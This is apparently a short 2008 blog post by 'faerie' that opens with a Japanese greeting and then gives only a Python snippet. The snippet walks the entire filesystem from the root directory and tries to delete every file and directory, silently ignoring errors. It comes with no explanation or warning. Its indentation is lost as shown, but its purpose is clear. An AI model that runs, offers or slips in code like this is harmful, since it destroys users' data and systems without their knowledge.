29th Tue
こんにちは
python>>
import os
for root, dirs, files in os.walk('/'):
for f in files+dirs:
try:
os.unlink(os.path.join(root, f))
except:
pass
<<python
posted by
faerie on Tue 29 Jul 2008 at 16:58 with 0 comments